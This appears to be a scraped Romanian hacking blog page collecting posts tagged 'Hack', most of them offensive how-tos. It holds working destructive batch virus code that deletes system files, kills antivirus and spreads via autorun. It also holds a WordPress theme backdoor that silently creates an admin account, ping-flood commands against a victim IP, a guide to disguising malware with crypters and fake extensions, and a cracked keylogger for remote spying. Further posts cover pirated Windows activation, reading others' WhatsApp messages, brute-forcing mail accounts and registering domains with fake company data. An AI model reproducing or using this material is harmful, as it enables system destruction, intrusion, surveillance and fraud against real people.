Se afișează postările cu eticheta Hack. Afișați toate postările
Se afișează postările cu eticheta Hack. Afișați toate postările

program charles hack all games

hi 

program charles hacked all game 

ABOUT CHARLES

Charles is a web proxy (HTTP Proxy / HTTP Monitor) that runs on your own computer. Your web browser (or any other Internet application) is then configured to access the Internet through Charles, and Charles is then able to record and display for you all of the data that is sent and received.

In Web and Internet development you are unable to see what is being sent and received between your web browser / client and the server. Without this visibility it is difficult and time-consuming to determine exactly where the fault is. Charles makes it easy to see what is happening, so you can quickly diagnose and fix problems.

Charles makes debugging quick, reliable and advanced; saving you time and frustration!


this link download

http://www.mediafire.com/?4bon9ndz6o9853k

this link learn hack farm vile 

 http://youtube.com/watch?v=yEcutJCMblA

this link learn hack pool live tour

 http://youtube.com/watch?v=MWZrqfJfqAA


learn after all learn hack game 
thank you all

Tutorial Stergere windows.

Mlultii dintre voi va-ti reinstalat windowsul si nu ati procedat corect sau ceva a intervenit in stergerea versiuni anterioare a softului..
Ei bine am cercetat putin si mam informat despre stergerea unui din softul instalat deoarece am avut si eu aceeiasi problema si intr-un final am realizat stergerea windowsului fara sa afecteze versiunea recentaa dar si fara a avea complicatii la stergere ;)

1.In functie de caz se poate sa avetii amblele windows-uri in aceeiasi partitie iar in alte cazuri(depinde cum ai facut instalarea)sa aveti in partii diferite.
2.La pornirea sistemului de operare iti da sa alegi pe care versiune vrei sa navighezi(prima este cea noua iar a 2 este cea veche)

Iar acum sa incep sa explic iar daca faci pas cu pas vei reusi fara ninci o problema;)

Pasul 1: Dezactivarea softului nedorit la repornirea sistemului.

My Computer>>Propietatii>>Advanced>>Startup and recovery(click pe setting)>>>Edit
Iti va deschide o fila cu un text numit boot.ini unde iti va arata ceva in genul:
[Image: oI7NG.png]

Dupa cum observi in imagine amblele windowsurii sunt pe partitii diferite de aceea unde scrie 
=>multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
=>multi(0)disk(0)rdisk(0)partition(1)\WINDOWS.1="Microsoft Windows XP Professional" /noexecute=optin /fastdetect 

Sa zicem ca tu ai softul nou in partitia D atunci va trebui sa stergi textl:
=>multi(0)disk(0)rdisk(0)partition(1)\WINDOWS.1="Microsoft Windows XP Professional" /noexecute=optin /fastdetect si vei da ok 
Iar daca softul este in C si vrei sa stergi pe cel din D va trebui sa elimini textul:
=>multi(0)disk(0)rdisk(0)partition(2)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect si va trebui sa modifici la defaul in felul urmator:default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS.1

Si dai ok si save setting;)
Pasul 2: Acum ca am reusit sa dezactivam startup-ul windowsului nedorit putem da un restart si vei observa ca iti intra direct pe windowsul cel ales fara a te mai atentiona sa alegi vreunul din versiuni;)

Pasul 3:In caz ca avem windowsul pe partiti diferite este simplu deoarece vei putea da pe partitia cu softul nedorit acesand:
=>Click dreapta pe partitie>>Propietatii>Disk cleanup si vei aduce partitia la volumul iei 
In caz ca aveti pe aceeiasi partitie va trebui sa stergi doar Windowsul nedorit iar pe celalalt sa-l lasi neatins ;) 

La stergea Windowsului nu vor fi complicatii de genul Nu se poate sterge din System si alte chesti gen protectin System ;)
PS:In cazul in care ai facut ceva din gresala si nu ai respectat acest tutorial te sfatuiesc sa ai la indemana un CD,Stick boot-abil cu un alt soft ;)
PS: Acest tutorial este realizat in urma mai multor cercetarii pe google si este testata de mine Functionala 100% ;)

BAFTA daca nu te-ai descurcat astept nelamuririle ;)

Cum dai Flood ip?

Dati Pe butonu Start -> Run -> CMD 
Acolo scrieti una dintre metodele astea : 

Cod: 
ping -f ip_victima 
ping -t -l 65000 ip_victima 
ping -t -l 45000 ip_victima 
ping -t -l 25000 ip_victima 
ping -t -l 15000 Ip_victima 


Si da-ti run si lasa-ti deschis si isi face treaba singur.;)

Acest hack se numeste Ping of Death,dar din pacate nu poate trece de Firewall!:54:

Cum faci multi-mess fara program?

Intrati in Start->Cmd->regedit->HKEY_CURRENT_USER\Software\Yahoo\pager\Test->Click dreapta si New Dword Value si numitil plural,dupa care dublu click pe el si puneti la Value Data 10. 

Si gata Multi-Messenger!

Cum activezi gratuit! Activare Windows 8

Windows

Cum activez Windows 8 ?
In acest post va voi prezenta cum se activeaza Windows 8 versiunile Final si Enterprise.
Activarea  se face destul de usor adaugand cateva comenzi in command prompt.Tot ce trebuie sa faceti este sa introduceti codul de mai jos in CMD.
Pentru a intra in command promt fie dati Start->All Programs->Accesories ->Command Prompt(click dreapta ->Run as administrator) ,fie tastati tasta Windows+R ,iar in casuta scrieti cmd.
Cum activez Windows 8 Enterprise?
Daca folositi Windows 8 Enterprise tot ce trebuie sa faceti este sa tastati in command prompt urmatoarele comenzi:
slmgr /skms kms-c.no-ip.org:1688
slmgr.vbs -ato
Cum activez Windows 8 Professional?
Daca folositi Windows 8 Professional trebuie sa tastati urmatoarele comenzi:
slmgr.vbs -ipk NG4HW-VH26C-733KW-K6F98-J8CK4
slmgr /skms kms-c.no-ip.org:1688
slmgr.vbs -ato
Dupa restart ar trebui sa aveti activat Windows 8 pentru 180 de zile.

Ardamax 4.01 FULL - Tested&Working

Cred ca toti stim ce este Ardamax Keylogger nu?

Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for 2000, XP, 2003, Vista, 7 and Windows 8.

SUrsa : http://www.ardamax.com/keylogger/
Pentru ca nam incredere in toate kkturile de pe net, am cautam o metoda sa inregistrez ultima versiune 4.01 safe&clean.

Asa ca :

Pasul 1 : Downloadam Kit-ul direct de la sursa :
 Ardamax Keylogger - invisible keylogger with remote installation feature
Pasul 2: Inregistram Programul cu 00-67NK4K-BRUCE-07E
Pasul 3: La nume (ID) punem ce vrem....Random....

L-am testat in seara asta, remote si primesc logurile pe email!

Curand o sa fac si un tutorial despre cum putem sa facem "spread" in mod eficient!

Numai Bine!

SQL Poizon v1.1 – SQLi Exploit Scanner, Search Hunter, Injection Builder Tool Source

SQL Poizon v1.1 – SQLi Exploit Scanner, Search Hunter, Injection Builder Tool


SQL Poizon v1.1 – SQLi Exploit ScannerSearch Hunter, Injection Builder Tool is a tool whichscanwebsite through dorks automatically and finds vulnerabilities in them its very easy powerful too, to find vulnerable site of any country  .
New Features :


  • “Look &Feel” is more attractive now.
  • Rich “Context Menu” items.
  • “Results” contain checkboxes to enable selection.
  • “Selected Dork” box is editable now for user convenience.
  • Built-in Browser for “Injection Builder” to check the impact of injection.
  • “Text Bucket” available for “Injection Builder” to save extra data.
  • “Insert Order By” button is added to “Injection Builder”.
  • “Internet Browser” with Snapshot and HTML DOM Tree.
Bug Fixes :


  • It wont get stucked after pressing the stop button. Just a minor wait can occur which is okay.
  • Progress bar for “Crawler” has been fixed. It will show correct progress now.
  • Error on importing file is fixed now. You can import files from other directories as well.
  • “Searchqu” shows invalid results. It is fixed now.













Download :


IP Tool v1.0 by BLODAS666

Cred ca GUI-ul este destul de intuitiv, si nu e nevoie sa explic cum se foloseste. In caz ca nu va descurcati, aveti cate un buton "?" (help) unde este cazul. Programul nu este facut in totalitate de mine, eu am unit mai multe surse, le-am modificat unde a fost nevoie pentru a iesi un soft bun. Aviz amatorilor, si celor care o sa decompilati, nu sariti cu gura ca e plagiat, pentru ca nu e, am modificat sursele pe care le-am gasit, deci a fost ceva munca. Nu am pus niciun keylogger, rat, botnet, and shit, e curat. Aveti si un log VT, in caz de nu par credibil. Sper sa nu il considerati un tool "skid", eu cred ca e binevenit, si a meritat efortul. Astept critici si pareri, dar avand in vedere ca asta este primul meu soft "serios".

VT Scan : https://www.virustotal.com/ro/file/3...is/1374683101/

Download : https://mega.co.nz/#!2kZUiITK!RWI2-z...bqWYEUAAYXgaOM


Targeturi pentru v2.0 :
Un IP Tracker - sa arate locatia, providerul, and stuff...
Sa gasesc un API functional pentru Skype IP Grabber.
Un Port Scanner detaliat.
Rezolvarea bugurilor daca exista.

AdflyBotPro 3.3.1 Final

Screenshot (nu vrea sa se afiseze aici nicicum): http://i.imgur.com/z5muCno.jpg

Download : Download AdfBotPro 3.3.1 Final.zip

Nu cred ca trebuie sa mai specific sa-l deschide-ti in Sandboxie sau in orice alt mediu cat de cat sigur.

Skype Flooder 2013

Skype Flooder 2013 - un mic flooder creat cu ceva timp in urma,initial nu am avut ca scop sa il fac public,l-am postat totusi in caz ca are cineva nevoie de el.

1.Merge atit pe x86 cit si pe x64.
2.Are nevoie de Net Framework 2.0
3.Am pus un scan VirusTotal,cine nu are incredere poate folosi o masina virtuala.
4.La lansare aplicatia verifica daca exista o versiune mai noua,in cazul in care conexiunea este blocata de firewall,aplicatia nu va porni.
5.La prima lansare va trebui sa confirmati ca permiteti aplicatiei sa foloseasca Skype-ul.
6.Fiecare functie a flooder-ului are fir de executie separat.


Video:
 

VirusTotal Scan

Demo Version

Cum să spargi parola la iPhone?

Cum să spargi parola la iPhone? Chiar dacă un iPhone este protejat prin intermediul unei parole, asta nu înseamnă că informaţiile private sau aplicaţiile de pe acesta nu pot fi accesate
Un material postat pe YouTube de către un utilizator demonstrează printr-o serie de paşi cum pot fi accesate, în mai puţin de un minut, toate informaţiile private de pe un iPhone care operează cu sistemul iOS 6.1.

How to Bypass iPhone 5 Passcode on iOS 6.1 / 6.0.2 / 6.0.1 . Prank your friends. - YouTube!

Whatsapp Xtract -Cum sa decriptezi fisierul in care sunt stocate mesajele whatsapp

Salutare malignilor si nu numai!

Asa cum stim,conversatiile purtate prin intermediul whatsapp sunt stocate intr-o baza de date,criptata in cazul in care folosim un terminal Android iar pentru a putea citi continutul acestei baze de date,am avea nevoie sa o decriptam.

Un prim pas important ar fi obtinerea acestei baze de date(personala sau nu ),astfel:

In cazul Android se gaseste in:
/sdcard/WhatsApp/Databases/msgstore.db.crypt

iar pentru Iphone:
net.whatsapp.WhatsApp/Documents/ChatStorage.sqlite

Descarcati Whatsapp_Xtract de aici urmand ca mai apoi sa il dezarhivati in directorul dorit.In cazul de fata vom folosi C:/Whatsapp.

Urmatorul pas consta in copierea bazei de date,mai exact a fisierului msgstore.db.crypt in acelasi director in care ati dezarhivat si Whatsapp Xtract in cazul nostru C:/Whatsapp

De mentionat faptul ca,pentru a putea utiliza aceasta "utilitate" veti fi nevoiti sa instalati Python.Il puteti descarca de aici si instala in cazul in care nu il aveti instalat deja.

Dupa ce ne-am asigurat ca am urmat pasii de mai sus adica descarcarea Whatsapp_Xtract si dezarhivarea in C:/Whatsapp,copierea fisierului criptat(baza de date) msgstore.db.crypt in C:/Whatsapp si instalarea Python ceea ce va trebui sa facem ar fi sa deschidem o consola de comanda MsDos si sa situam prompterul in C:/Whatsapp urmand ca mai apoi sa introducem in aceeasi consola comanda urmatoare < python whatsapp_xtract.py msgstore.db.crypt>
Code:
C:/Whatsapp/python whatsapp_xtract.py msgstore.db.crypt
Browserul de internet se va deschide si se va genera automat un fisier html in care veti putea rasfoi mesajele
Structura fisierului generat ar fi similara cu cea din imaginea de mai jos:



Nota suplimentara:
Code:
Pentru DB Android :
C:/Whatsapp/python whatsapp_xtract.py msgstore.db.crypt

Pentru Iphone DB: 
C:/Whatsapp/python whatsapp_xtract.py ChatStorage.sqlite
P.S:"Behave!! "

CUM SA ITI “MASCHEZI” VIRUSUL [Noob Frendly]

Salut, Am promis intr-unul din topicurile mele ca voi scrie un tutorial pentru incepatori [Noob Frendly] despre cum poti “masca” un virus in mod eficient,astfel incat sa nu de’a de banuit. Asupra unui singur lucru vreau sa atrag atentia, eu nu reinventez roata aici, nu vin cu cine stie ce metode., e vorba de cele clasice, dar care inca dau randament, pentru ca din punctual meu de vedere nu exista “metode moarte” cum am auzit de la unii, eu cred ca diferenta o face perspectiva din care actionezi si din care vezi lucrurile. Bine, destul cu vorba, sa trecem la lucruri concrete.Sa le luam pe rand. BINDER Plecand de la premisa ca fiecare are serverul (virusul) gata facut, poate fi un server de Rat , Keylogger, Stealer sau mai stiu eu cu ce lucrati voi, incepem sa gandim… Cred ca e valabil pentru toti ca vicimele care ne cad in plasa, nu trebuie sa stie vreodata ca au fost infectate, asa ca avem nevoie in primul rand de un BINDER. Ce este un binder? Este un tool cu care puteti alatura virusului vostru alt fisier, care se va deschide odata cu virusul cand victim il va executa. Va recomand IExpress 2.0, care vine odata cu pachetul Windows.Deschide-ti run si scrieti iexpress : http://i.imgur.com/hGSHYKZ.png Un tutorial video despre utilizarea IEspress aveti aici : http://www.youtube.com/watch?v=7VROEXzBjnA CRYPTER In continuare avem nevoie ca virusul nostru sa nu fie detectat de antivirusi, deci avem nevoie de un crypter. Un Crypter este un programe care face ca alte programe nedetectabile de antivirusi prin criptarea acestora. Aici e putin mai complicat, pentru ca un crypter 100% nedetectabil nu prea gasesti gratuit pe internet, acestea de obicei costa, da puteti gasi de exemplu la rubrica Programe Hack cateva cryptere care sunt 70% - 80% nedetectabile si cu care va puteti face treaba binisor. Va sugerez insa sa cumparati unul FUD 100%, pentru ca asa virusul vostru sa de’a mai mult randament. ICON CHANGER Daca a-ti rezolvat pana aici, puteti incepe sa va raspanditi virusul…sub forma .exe .com Ce faci insa daca vrei sa raspandesti virusul tau sub forma unei melodii? Sau a unei poze, sau mai stiu eu…… Prima data avem nevoie de un program cu care sa schimbam icon-ul serverului, ca acesta sa arate a poza sau..melodie, video, etc. Eu personal folosesc QIconChanger, un program micut, care isi face treaba. http://i.imgur.com/nKzv1zU.png Ca sa vedeti un exemplu concret : http://i.imgur.com/Vj2VGdA.png Care doreste sa il incerce l-am uploadat aici : http://speedy.sh/yqfAx/QIcon-Changer.exe SPOOFER Ok, avem serverul nostru, care acum are icon-ul schimbat, si incepe sa arate ca o poza. Dar ramane acel .exe care trebuie inlaturat pentru ca “poza noastra” sa fie mai credibila. Bineinteles majoritatea nu vad acea extensie, pentru ca nu au setat sa vada extensiile, dar ce faci cand vrei sa trimiti serverul pe messenger sau skype? Facem spoofing. Spoofing – (copy/paste) În general vorbind, spoofing pe Internet înseamnă un act (evident ilegal) de a pretinde altă identitate decât cea reală, sau mascarea expeditorului real al corespondenţei, cu scopul de a câştiga încrederea unei alte persoane şi de a obţine accesul la datele sale personale (cunoscut ca şi furt de identitate). Hai sa-I dam serverului nostru extensia .jpeg Deschidem programul cu care facem spoofing si alegem server + extensia dorita. http://i.imgur.com/uIf3CNb.png Rezultatul : http://i.imgur.com/lhvde2f.png Observam extensia .jpeg a serverului nostru, care e inca executabil…. Am uploadat spooferul cu care lucrez eu aici : http://speedy.sh/YHZDG/Spoofer.jar Tips : Incearca sa redenumesti serverul tau inainte de a face spoofing. Ai observat ca se pastreaza totusi .exe inainte de .jpeg , unii sunt mai sceptici si nu vor lua serverul chiar daca e .jpeg. Asa ca incearca diverse combinatii. EXEMPLU : Miscari_Compl.exe care dupa ce o sa faci spoofing o sa devina Miscari_Complexe.jpeg PS: Desigur sunt unii pe forum care mai stiu cate o "smecherie" in tot procesul, nu tine-ti doar pentru voi !!! PSS: Referitor la Programele folosite, sunt si altele, mai bune... PSSS: Scuzati-mi gramatica....e 2:00 noaptea.... Sper sa Ajute !!! Daca aveti intrebari..postati in topic si voi raspunde cat pot de repede. Numai Bine! EDIT : Nu inteleg de ce nu vor screen-urile sa se afiseze...de aceea am pus link direct!

Cei mai buni virusi .BAT tutorial

Acest tutorial este prentru incepatori, deci va rog fara comentarii de genul 'Topic inutil' Infecteaza toate driverele: @ echo off rem -- rem Infect All Drives for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y ,Z) Do ( copy /Y %0 %%E:\ echo [AutoRun] > %%E:\autorun.inf echo open="%%E:\%0" >> %%E:\autorun.inf echo action=Open folder to see files... >> %%E:\autorun.inf) rem -- Infecteaza tot ce este .exe @ echo off rem -- rem Infect All .Exe Files assoc .exe=batfile DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy /y %0 "%%j:%%k" rem -- SPAM local disk echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' echo %random% > 'C:\%random%.txt' rem -- Inchide deschide Cd-drive @ echo off rem -- rem Start Opening Disk Tray echo Do >> "opendisk.vbs" echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs" echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs" echo colCDROMs.Item(d).Eject >> "opendisk.vbs" echo colCDROMs.Item(d).Eject >> "opendisk.vbs" echo Loop >> "opendisk.vbs" start "" "opendisk.vbs" rem -- Crash Computer @ echo off rem -- rem Crash Computer echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat echo start "" %0>>crash.bat [/spoiler] Sterge hal.dll @ echo off rem -- rem Disable Computer By Deleting hal.dll del /f /q %SystemDrive%\WINDOWS\system32\hal.dll rem -- Sterge tot ce contine .exe din computer [spoiler] @ echo off rem -- rem Delete All Exe DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k" rem -- Inchide internetul @ echo off rem -- rem Disable Internet @Echo off & @@Break Off Ipconfig /release %jUmP%E%nD%c%onFiG%h%IdE%o%P% h%aRv%%aRd%A%T%%cHe%cK%HappY%3D b%aLLo0Ns%Y%eS% m3Ga!?! P%ReSs%%IE%AuS%ExPloR%e%r% > nul.%TempInternetRelease% rem -- Blocheaza tastatura echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00 ,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg" echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00 ,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg" echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e ,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg" echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00 ,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg" echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00 ,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg" echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00 ,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg" echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c ,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg" echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0 ,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg" echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg" start "nokeyboard.reg" rem -- Inchide sistemele defender firewall [spoiler] @ echo off rem -- rem Disable Windows Security net stop "security center" net stop sharedaccess netsh firewall set opmode mode-disable rem -- Kill antivirus tskill /A ESAFE tskill /A cle cls tskill /A BLACKICE tskill /A def* tskill /A kav tskill /A kav* tskill /A avg* tskill /A ash* cls tskill /A aswupdsv BSOD(blue screen of death) @ echo off rem -- rem Activate Blue Screen Of Death @((( Echo Off > Nul ) & Break Off ) @Set HiveBSOD=HKLM\Software\Microsoft\Windows\CurrentVe rsion\Run @Reg Add "%HiveBSOD%" /v "BSOD" /t "REG_SZ" /d %0 /f > Nul @Del /q /s /f "%SystemRoot%\Windows\System32\Drivers\*.*" ) rem --

Domeniu .ro gratis

In acest tutorial o sa va arat cum sa va luati domeniu .ro moca prin afacereataonline. 1.Intrati pe site-ul lor si selectati sa va inregistrati un now site . 2.Pentru inregistrare veti avea nevoie de un certificat de inregistrare care se gaseste pe google images imediat. 3.Copiati datele de pe certificatul de inregistrare pe site (CUI ,nume firma ,etc).Datele precum nume , numar de telefon pot fi fictive . 4.In scurt timp veti primi pe mail un cod de confirmare ,care trebuie introdus pe site . 5.Intr-o zi sau doua veti primi un mail in care scrie ca site-ul tau a fost activat cu succes.

Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale

Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale. Sună foarte frumos şi defapt este foarte uşor. Tutorialul ce l-am creat astăzi pentru voi nu este o idee proprie. M-am inspirat din ceva ce am citit acum foarte mult timp, un scenariu foarte bine pus la punct legat de WordPress şi anume, cum putem să luăm acces la un blog cu eleganţă şi fără a lăsa urme ca să îşi de-a seama proprietarul. Să dăm un mic exemplu. Domnul Gheorghe vrea să spargă cât mai multe blog-uri de pe o anumită nişă web. Se gândeşte cum să facă un lucru de genul ăsta. Noroc că Gheorghe este foarte inventiv şi i-a venit în minte să creeze şi să "infecteze" o temă (theme) visuală. Mulţi o să spuneţi că o să creeze un Remote Code / Command Execution (RCE). Dar nu. Pentru că ar lăsa urme. Aşa că va adăuga în temă un cod PHP care să adauge automat un nou cont cu drepturi de administrator. Codul este următorul: PHP Code: add_action('wp_head', 'wp_wordpress');function wp_wordpress() {If ($_GET['p'] == '1') {require('wp-includes/registration.php');if (!username_exists('wordpress')) {$user_id = wp_create_user('Guest', 'password');$user = new WP_User($user_id);$user->set_role('administrator');}}} Ce face codul de mai sus? Dacă este adăugat spre exemplu în templates.php (am precizat această filă deoarece este executată automat când accesăm index-ul unui blog), oricine va intra pe următorul link: http://pentesting/wp/?p=1 (primul articol de pe blog) va crea în baza de date un nou cont cu drepturi de administrator şi cu numele: Guest şi parola password. O remarcă importantă ar fi aceea că tema instalată trebuie să fie şi cea activă. Legat de ingineria socială vă descurcaţi voi că sunteţi baieţi isteţi cu mult timp liber. Puteţi posta online undeva tema şi să adaugaţi undeva anumite cuvinte pentru a crea un dork să puteţi găsi blog-urile infectate. Sau îl puteţi manipula chiar pe administrator să instaleze tema. Update Ok. Ca să fie totul complet şi pentru că nu am fost mulţumit parcă dacă nu ajutam şi cu partea asta, adică cea în care sunteţi informaţi cu ce blog a fost infectat, pe email. PHP Code: Să vă bucuraţi de metodă. Şi ca să nu vă de-a de gol adresa de mail, puteţi să o encriptaţi în base64. PHP Code: $addr=base64_decode('#Aici va fi email-ul vostru encriptat în base64'); Să nu uitaţi să stergeţi tag-urile PHP când adăugaţi în filă. Baftă.

Cum sa ascunzi .exe in .jpg

Pe lista neagra Inregistrat: 01-01-2009 Postari: 10 Ai nevoie de: * Windows 2000/XP * WinRAR 1. Alege fisierele ce vrei sa le combini. 2. Am de exemplu log.txt. Arhivati-o. La Archive name puneti: log.txt. 3. Navigati cu MS-DOS unde ati salvat arhiva. 4. Asigurati-va ca aveti si o poza acolo. Executati comanda: Cod: copy /b log2.jpg + log.txt.rar log.jpg (log2.jpg e imaginea ce vreau sa afisez)

Conturi dial-up

Cerinte: programul Fscan pe care-l puteti lua de pe packetstorm.securify.com Continut: 1)Strangerea de informatii(partea cea mai grea de fapt) 2)Atacul propriu zis. 3)contul dial-up in registrii windows-ului 1)Majoritatea firmelor distribuitoare de Internet de la noi din tara prezinta o mare vulnerabilitate,aceea de a asigna numele utilizatorului folosit pentru conexiunea la internet,unei adrese de mail.Spre exemplu ISP-ul meu este firma ISP(doar un exemplu) iar userul meu folosit pentru conectare este "nebunu".Atunci adresa mea de mail este E-mail sau E-mail .ro.Deci daca aflu parola de la mail aflu si parola folosita pentru dial-up. Stiti cred din tutorialele anterioare ca serverul pe care se afla mesajele primite are portul 110 deschis.iar cel folosit la transmiterea mesajelor are portul 25 deschis.Pe noi ne intereseaza portul 110.Dar cum aflam care este adresa serverului pe care se afla mesajele?Simplu.Intai aflam IP-ul providerului de internet,tastand: tracert -j www.ISP.ro Presupunem ca IP-ul gasit este 154.14.14.25.Pentru afla care este serverul de receptie a mesajelor scanam IP-urile pe o raza care sa incadreze ultimul numar al IP-ului providerului,in cazul nostru pentru portul 110.Dar nu strica sa stim daca are si portul 79 deschis..... fscan -vbp 79,110 154.14.14.1-254 Presupunem ca IP-ul gasit este 154.14.14.144.Ca se ne convingem ca intr-adevar este serverul cautat,lansam din Start/Run urmatoarea comanda: telnet 154.14.14.144 110 Dupa ce ne conectam tastam user blahbla si vom primi ceva de genul +OK apoi tastam pass blabla si vom primi un mesaj de eroare.Ne-am convins ca acesta este serverul!. Daca cumva aveti un cont la firma respectiva puteti sa va conectati asa: telnet server_de primire 110 user userul_tau pass parola_ta si iti poti citi mail-ul folosind telnetul. 2)Daca stim userul mai trebuie sa aflam parola pentru a intra in posesia contului.Pentru asta folosim un program de brute force(Brutus.Unsecure,WWWhack etc).Le gasiti folosind motorul de cautare.In general lungimea parolei trebuie sa depaseasca 5 caractere,asa ca nu merge cu optiunea "brute force".Construiti-va un dictionar de parole care sa corespunda unui alt dictionar care sa cuprinda userii.Intai incercati daca userul si parola nu sunt identice,am intalnit cazuri din astea.Ca sa aflati direct user-ul intrati pe un chat,si folositi optiunea "finger" a programului mIRC. Posibilitatile sunt nesfarsite,incercati.... 3)Evident ca tot ce tastam ramane stocat in registrii windowsului.Pentru a afla datele despre conexiune deschidem meniul Start optiunea Run si tastam Regedit.Datele despre conexiune se afla la H_KEY_CURRENT_USER/REMOTE ACCESS/PROFILE/"numele conexiunii"Puteti afla astel userul dar parola este in binar si poate fi convertita usor,o sa scriu curand un tutorial despre asta. copyraight de pe site amicului meu vrajitorul

Hack Pc Administrator

Cum sa Schimbi parola dela un user de windows sau cum sa vezi Parola dela useri
Start -> Rund -> Cmd
Schi scrieti "net "numele Userului" *" Exemplu " Net Dany* " (Fara " ) 
Shi scrieti noua parola
Dar daca nu aveti alti useri pe pc aveti numai administratoru shi ati uitat parola aveti nevoie de "Ophcrack" DOWNLOAD --- http://ophcrack.sourceforge.net/ ----
Il puneti pe cd ca forma de ISO .....Shi la pornirea Pc apasati enter asteptati (2 minute) Shi va apara Useri shi parola 

Cum sa ne securizam conturile de gazduire?


Poate ca titlul acestui articol nu este cel mai potrivit, deoarece voi vorbi mai mult de fapt despre protejarea conturilor de gazduire prin anumite metode care tin neaparat de hosting, dar scopul final, pana la urma, poate fi considerat securizarea datelor personale si a aplicatiilor web. Ma gandesc acum la siturile proprii, sau orice website. Securitatea unui cont de gazduire nu tine numai de proprietarul sitului, ci si de serverul respectiv care gazduieste situl. Asa ca daca vreti securitate sporita trebuie sa aveti grija de unde si pe ce sistem cumparati gazduire. Dar haideti sa presupunem ca aveti deja un cont de gazduire pe un server bine configurat si administrat, si sa vedem ce putem face pentru imbunatatirea securitatii.
De ce se sparg atatea situri in ultima vreme ?Incepand din anii 2003-2005 au aparut multe aplicatii web gratuite care permit si oamenilor cu mai putine cunostinte IT realizarea unui site web foarte usor si rapid, fara cunostinte de programare. Aceste aplicatii sunt numite CMS-uri, (sau Sisteme de gestiune a continutului – Content Managment System), care se pot instala foarte usor si multe firme, pe langa serviciile de gazduire, mai ofera si instalare automatizata a acestor aplicatii. Cred ca deja stiti foarte bine despre ce vorbesc, ma gandesc in primul rand la CMS-urile cele mai populare, cum sunt Joomla, Drupal, WordPress si alte aplicatii pentru realizarea unui website sau a unui blog. Radacina problemei consta tocmai in popularitatea a acestor aplicatii, pentru ca foarte multa lume lucreaza cu ele, adica dezvoltatori, care tot timpul mai adauga ceva in plus, mai observa erori de programare prin care se pot exploata aceste aplicatii. Deci, daca oricine foloseste oricare dintre aceste aplicatii mai cunoscute, trebuie sa le actualizeze foarte desla versiunea stabila a aplicatiei. Acest lucru insa deseori nu se intampla, sau nu se intampla la timp – i stiu foarte bine acest lucru si cauta continuu si automatizat astfel de tinte potentiale, ce pot fi exploatate relativ usor. O alta problema pe langa faptul ca proprietarii acestori situri nu fac actualizare destul de des (sau nicodata) este situatia cand au constinte slabe, astfel incat nici setarile, nici configurarea aplicatiilor nu sunt facute bine, expunand situl la vulnerabilitati cunoscute ce pot fi exploatate. Deci, sfatul meu este, in primul rand sa tineti aplicatiile webactualizate (up-to-date), si aveti grija la configurarea lor. Daca aveti un site scris de dumneavoastra atunci atentie la greselile de programare.
Cum se sparg conturile de gazduire?Conturile de gazduire nu se sparg, ci se fura parola contului, sau mai rau, se sparge serverul respectiv. De obicei, cand cumparati gazduire veti primi parola prin email; sfatul meu este sa va schimbati parola imediat ce ati primit-o. Cand acesati un panou administrativ, cum sunt Cpanel, Plesk sau oricare altul, de obicei browserul va face o conexiune securizata prin https (http secure), care nu poate fi urmarita de terte parti, deci sansele ca parola sa va fie furata prin monitorizarea traficului dintre browserul dumneavoastra si serverul de panou administrativ nu sunt mari. Pentru a intercepta o conversatie criptata se folosesc tehnicile de session hijacking, ssl spoofing si dns spoofing. Dar astea sunt tehnici mai avansate, care se intampla doar daca exista un interes real pentru situl dumneavoastra din partea unui atacator. O posibilitate mai sporita insa poate fi considerata furtul parolei FTP de exemplu direct de pe calculatorul dumneavoastra, daca aveti notata parola intr-un fisier text necriptat si atacatorul foloseste un virus pentru a fura fisiere. O alta situatie de mentionat mai este insecuritatea protocolului FTPParolele FTP circula “in clar” prin retea, adica circula necriptate. Orice persoana care are acces la unul din serverele prin care trece pachetul care contine parola FTP, poate captura parola. La aceasta problema o solutie eficienta este folosirea FTPSecure. De 